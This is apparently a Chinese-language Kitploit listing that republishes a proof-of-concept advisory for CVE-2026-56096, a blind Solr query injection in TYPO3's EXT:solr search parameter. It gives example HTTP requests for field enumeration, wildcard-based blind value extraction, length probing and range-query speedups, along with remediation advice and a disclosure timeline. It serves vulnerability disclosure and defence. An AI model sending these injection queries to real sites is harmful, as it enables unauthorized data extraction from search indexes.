Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-56096 — CVE-2026-56096 的概念验证与技术分析:TYPO3 EXT:solr 中的盲 Solr 查询注入,可实现未认证的字段枚举与数据提取。 | Kitploit
工具/GitHubGitHub/yairhinkis/cve-2026-56096
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全论文与研究
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

CVE-2026-56096 的概念验证与技术分析:TYPO3 EXT:solr 中的盲 Solr 查询注入,可实现未认证的字段枚举与数据提取。

查看仓库
9小时54分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-56096:TYPO3 EXT:solr 中的 Solr 查询注入与盲数据提取

在官方 TYPO3 Apache Solr 扩展(EXT:solr / apache-solr-for-typo3/solr)中发现了一个架构性安全漏洞。该问题允许未经身份验证的远程攻击者通过搜索参数 tx_solr[q] 注入任意 Solr/Lucene 查询语法,从而能够从搜索索引中进行未经授权的盲字段枚举和完整元数据提取。


元数据

  • CVE ID: CVE-2026-56096
  • 漏洞类型: CWE-943:数据查询逻辑中特殊元素的不当中和
  • 目标组件: EXT:solr(搜索参数:tx_solr[q])
  • CVSS v4.0 评分: 6.3(中危) — CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • 研究人员: Yair Hinkis

漏洞概述

EXT:solr 扩展通过 tx_solr[q] 参数接受用户提供的搜索词,并将其转发给 Apache Solr 引擎。按照设计,该扩展允许特定的查询操作符——例如通配符(*)、单字符通配符(?)、字段选择器(:)和范围查询([a TO z])——以支持分面过滤等合法功能。

由于这些字符在未经过强制白名单或查询抽象层的情况下被直接传递到后端查询构造中,攻击者可以提供字段特定的语法来突破预期的搜索边界。这使得未经身份验证的用户能够直接查询内部 Solr 字段,并使用基于布尔值的盲注技术提取索引数据。


攻击技术

1. 通过 field:* 进行字段枚举

通过在任意或猜测的字段名后附加通配符,攻击者可以验证该字段是否存在于 schema 中:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:* HTTP/1.1
Host: target.example.com

如果该字段存在,Solr 会在所有匹配记录上处理该查询(通常会触发不同的响应代码或与数据量相关的行为),从而允许基于字典的自动化字段枚举。


2. 通过前缀通配符进行盲值提取

攻击者可以使用布尔推断逐字符提取敏感字段值:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Returns search hits (Value begins with 'a')
GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (Value does not begin with 'b')


3. 通过 ? 操作符进行长度检测

单字符通配符操作符(?)可以在开始字符迭代之前确定存储字符串的确切长度:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Checks for 12+ characters)
GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Checks for 13+ characters)


4. 加速范围查询([a TO z])

范围查询允许对首字符进行二分搜索提取,将每个字符位置所需的请求数从 26 次减少到约 5 次:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Determines if character falls within 'a'-'m'
GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Determines if character falls within 'n'-'z'

结合长度检测、范围查询和前缀通配符,可以以最小的请求量实现完整字段提取。


影响

  • 机密性破坏: 完整提取 Apache Solr 中索引的所有字段(例如内部系统哈希、隐藏页面内容、用户相关元数据和系统标识符)。
  • 访问控制绕过: 绕过前端搜索过滤器和 TypoScript 显示限制。
  • 范围: 影响所有使用 EXT:solr 搜索端点的默认安装。

修复建议

全局字符转义是不够的,因为像 * 和 : 这样的操作符服务于预期的搜索功能。修复需要应用层白名单和解析模型:

  1. 在将用户提供的查询字符串分派给 Solr 引擎之前,将其解析为抽象语法树(AST)。
  2. 对允许的字段目标实施严格的白名单,禁止用户直接查询内部或受限字段。
  3. 中和源自不可信输入上下文的非白名单操作符滥用。

协调披露时间线

  • 2026 年 3 月 6 日: 在授权评估期间发现漏洞;初步通知供应商。
  • 2026 年 4 月 17 日: 供应商实施了本地边缘缓解措施;确认了上游缺陷性质。
  • 2026 年 5 月 8 日: 向 TYPO3 安全团队([email protected])提交正式漏洞报告。
  • 2026 年 6 月 15 日: TYPO3 安全团队确认可复现,并与扩展维护者启动补丁开发。
  • 2026 年 8 月 25 日: 发布官方安全公告,发布补丁,并分配 CVE-2026-56096。

参考资料

  • TYPO3 安全公告: TYPO3-EXT-SA-2026-025
  • CWE 定义: CWE-943:数据查询逻辑中特殊元素的不当中和
下载工具